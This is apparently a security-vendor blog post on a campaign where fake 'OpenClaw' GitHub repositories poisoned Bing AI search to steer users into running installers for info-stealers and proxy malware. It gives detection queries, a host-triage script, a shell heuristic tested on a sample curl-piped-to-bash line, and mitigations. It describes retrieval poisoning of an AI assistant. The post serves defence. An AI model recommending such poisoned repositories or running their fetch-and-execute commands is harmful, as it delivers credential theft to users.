
Bing AI Deception: How Malicious GitHub Repos Exploit Search Engines to Deliver Info-Stealers

Security Arsenal Team
March 8, 2026
5 min read


In the rapidly evolving landscape of generative AI, we often discuss the potential for Large Language Models (LLMs) to hallucinate facts. However, a more dangerous reality is emerging: AI models being manipulated to distribute malicious payloads. Recently, security researchers uncovered a sophisticated campaign where Microsoft's Bing AI (now Copilot) was tricked into promoting a fake "OpenClaw" GitHub repository. This repository wasn't just a prank; it was a vector for information-stealing malware and proxy tools.

The Threat: AI-Powered Search Poisoning

The incident highlights a significant shift in social engineering. Traditionally, attackers relied on phishing emails or malicious ads to lure victims. In this case, they weaponized the trust users place in AI-generated summaries.

Here is how the attack chain unfolded:

  1. SEO Poisoning & Fake Repositories: Attackers created GitHub repositories designed to look like legitimate software projects (in this case, masquerading as the "OpenClaw" security tool). They optimized these repositories with keywords and documentation to appear authoritative.
  2. AI Indexing: Bing's AI-enhanced search crawled these repositories, interpreting the metadata and content as legitimate. The AI then began recommending the repository directly in search results and chat responses as a solution to user queries.
  3. The Hook: Users searching for tools or debugging help were presented with the malicious repo as a "featured" answer, bypassing the skepticism usually applied to standard search results.
  4. Execution: The repository instructed users to run specific shell commands to "install" the software. Instead of a legitimate installation, these commands deployed info-stealers (designed to harvest credentials, cookies, and crypto wallets) and proxy malware (used to route malicious traffic through the victim's IP).
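The execution step typically hinges on the familiar one-liner that pipes a remote script straight into a shell. As a minimal detection-oriented sketch (the function name, regex, and URL below are illustrative assumptions, not artifacts from the actual campaign), such a pattern can be flagged in a captured command line:

```shell
# Heuristic check for "download and pipe straight into a shell" one-liners,
# the execution pattern described in step 4 above.
# Note: the regex is a simple illustration, not a complete detection rule.
is_pipe_to_shell() {
    printf '%s' "$1" | grep -Eq \
        '(curl|wget|Invoke-WebRequest)[^|]*\|[[:space:]]*((ba|z|k)?sh|iex)'
}

# Example: a typical fake-installer one-liner (hypothetical URL)
if is_pipe_to_shell 'curl -sL https://raw.githubusercontent.com/example/fake-tool/main/install.sh | bash'; then
    echo "flagged: download piped directly into a shell"
fi
```

A real deployment would run a check like this against EDR command-line telemetry rather than ad hoc strings, but the shape of the indicator is the same.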

Technical Analysis

Attack Vector: AI Hallucination as a Service

The attackers did not hack Microsoft's infrastructure directly. Instead, they exploited the LLM's reliance on context and relevance. By flooding a repository with convincing-looking Markdown files (READMEs, LICENSEs, and documentation), they created a context that the AI classified as "highly relevant" and "helpful." This is effectively indirect prompt injection via SEO: the content ingested by the retrieval system is poisoned before the model ever sees a user query.

Malware Capabilities

According to the analysis of the fake installers:

  • Information Stealers: The malware targets sensitive browser data, including saved passwords, autofill entries, session cookies, and cryptocurrency wallet files, often sidestepping basic browser protections around stored credentials.
  • Proxy Components: By turning the infected machine into a proxy server, attackers can anonymize their own malicious traffic, making the victim's IP address appear responsible for attacks conducted by the threat actors.
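On the host side, one coarse triage signal for the proxy component is a process listening on a non-loopback socket where none is expected. As a hedged sketch (assumes a Linux host and `ss -tln`-style input; the column layout can vary between versions and tools), a small filter:

```shell
# Filters `ss -tln`-style output (State Recv-Q Send-Q Local:Port Peer:Port)
# down to listeners bound to non-loopback addresses, one rough signal
# of an unexpected proxy component on the host.
flag_nonloopback_listeners() {
    awk '$1 == "LISTEN" && $4 !~ /^(127\.|\[::1\])/ { print $4 }'
}

# Typical use on a live Linux host:
#   ss -tln | flag_nonloopback_listeners
```

Any hits still need manual attribution to a process and binary; legitimate services also bind non-loopback listeners, so this is a starting point, not a verdict.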

MITRE ATT&CK Mapping

  • T1608.006 (Stage Capabilities: SEO Poisoning): Attackers optimized the fake repository so it surfaced for specific technical queries.
  • T1204.002 (User Execution: Malicious File): The user executing the "installer" command.
  • T1059 (Command and Scripting Interpreter): Execution of the malicious payload via PowerShell (T1059.001), cmd (T1059.003), or bash (T1059.004).
  • T1555.003 (Credentials from Password Stores: Credentials from Web Browsers) and T1539 (Steal Web Session Cookie): Harvesting saved credentials and cookies.

Detection and Threat Hunting

Security teams should monitor for suspicious command-line activity from users who may have been misled by AI search results. In particular, look for patterns where PowerShell or Bash downloads and executes scripts directly from GitHub without any validation step.

KQL Query (Microsoft Sentinel/Defender)

Use this query to hunt for processes executing scripts from raw GitHub content, which is a common TTP in these repo-based attacks.

```kusto
DeviceProcessEvents
| where Timestamp > ago(7d)
| where ProcessCommandLine has_any ("github.com", "raw.githubusercontent.com")
| where ProcessCommandLine has "Invoke-WebRequest" or ProcessCommandLine has "curl" or ProcessCommandLine has "wget"
| where ProcessCommandLine has "Invoke-Expression" or ProcessCommandLine has "iex"
| project Timestamp, DeviceName, AccountName, ProcessCommandLine, InitiatingProcessFileName
| order by Timestamp desc
```

PowerShell Script for Host Investigation

This script checks for the presence of suspicious recent downloads or processes associated with common info-stealers and proxy tools that might have been dropped by these fake installers.

```powershell
# Check for recent PowerShell scripts in the temp directory
$tempPath = $env:TEMP
$threshold = (Get-Date).AddDays(-1)

Write-Host "Checking for suspicious scripts in $tempPath modified in the last 24 hours..." -ForegroundColor Cyan

$suspiciousFiles = Get-ChildItem -Path $tempPath -Filter *.ps1 | Where-Object { $_.LastWriteTime -gt $threshold }

if ($suspiciousFiles) {
    Write-Host "Alert: Found recently modified PowerShell scripts:" -ForegroundColor Red
    $suspiciousFiles | Format-Table Name, LastWriteTime, Length -AutoSize
} else {
    Write-Host "No suspicious scripts found." -ForegroundColor Green
}

# Check for unusual network connections (proxy malware check)
Write-Host "Checking for established non-local network connections..." -ForegroundColor Cyan
Get-NetTCPConnection -State Established |
    Where-Object { $_.RemoteAddress -notmatch "^(127\.|10\.|172\.(1[6-9]|2[0-9]|3[0-1])\.|192\.168\.)" } |
    Select-Object OwningProcess, RemoteAddress, RemotePort, State |
    Format-Table -AutoSize
```

Mitigation Strategies

To protect your organization from AI-search-based malware distribution:

  1. Validate Before You Execute: Never run terminal commands copied from an AI response or a GitHub README unless you have verified the publisher's digital signature or the reputation and history of the repository owner.
  2. GitHub Allow-listing: If your organization allows access to GitHub, consider implementing allow-list policies for specific repositories or using enterprise GitHub integrations that scan for malware in repositories.
  3. Restrict Script Execution: Enforce PowerShell execution policy restrictions (e.g., RemoteSigned or AllSigned) to block unsigned scripts, and remember that execution policy is a guardrail, not a security boundary; back it with application control such as AppLocker or WDAC.
  4. Network Filtering: Monitor and block connections to known malicious IP addresses and domains often associated with C2 servers used by info-stealers.
  5. User Awareness: Train your development and IT teams that "AI Recommended" does not mean "Safe." AI summaries are prone to manipulation and should be treated with the same suspicion as an unsolicited email.
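Mitigation #1 above can be sketched as a small helper (the function name and the idea of an out-of-band published checksum are illustrative assumptions, not part of any specific tool's workflow):

```shell
# Instead of `curl ... | bash`, download the installer to a file, verify
# its SHA-256 against a value published out of band (release notes,
# signed checksum file), and review it before running anything.
verify_installer() {
    file="$1"; expected="$2"
    actual=$(sha256sum "$file" | awk '{ print $1 }')
    if [ "$actual" != "$expected" ]; then
        echo "checksum mismatch for $file: refusing to run" >&2
        return 1
    fi
    echo "checksum OK; review before executing:"
    head -n 40 "$file"   # eyeball the start of the script first
}
```

Only after the hash matches and the script has actually been read should it be executed explicitly (e.g., `sh ./install.sh`), keeping the download and execution steps deliberately separate.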

Conclusion

The incident with the fake OpenClaw repository is a harbinger of future threats. As AI becomes the primary interface for information retrieval, attackers will inevitably pivot to poisoning the well. Vigilance, technical validation, and robust detection engineering are our best defenses against this new wave of AI-generated social engineering.

